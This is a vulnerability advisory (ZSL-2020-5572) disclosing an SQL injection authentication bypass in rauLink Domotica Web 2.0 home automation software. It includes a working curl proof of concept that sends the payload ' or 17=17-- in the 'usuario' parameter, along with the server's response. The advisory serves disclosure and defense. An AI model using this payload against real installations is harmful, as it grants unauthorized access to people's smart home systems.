rauLink Software Domotica Web 2.0 SQL Injection Authentication Bypass


Vendor: rauLink Software (raulsoria)
Product web page: N/A
Affected version: 2.0

Summary: Smart home automation software.

Desc: The application suffers from an SQL Injection vulnerability.
Input passed through 'usuario' POST parameter in registraUsuario is
not properly sanitised before being returned to the user or used in
SQL queries. This can be exploited to manipulate SQL queries by
injecting arbitrary SQL code and bypass the authentication mechanism.

Tested on: Apache/2.4.6 (Ubuntu)
           PHP/5.5.3-1ubuntu2.6
           phpPgAdmin/5.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5572
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5572.php


10.03.2020

--


$ curl http://192.168.1.75/registro/registraUsuario -X POST -d"usuario=' or 17=17--&password=zsl"
HTTP/1.1 200 OK
Date: Wed, 28 May 2008 00:06:54 GMT
Server: Apache/2.4.6 (Ubuntu)
X-Powered-By: PHP/5.5.3-1ubuntu2.6
Set-Cookie: PHPSESSID=gl8tbui3skca9d74m5pg7l6q96; path=/
Expires: Thu, 10 Dec 1983 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Content-Type: text/html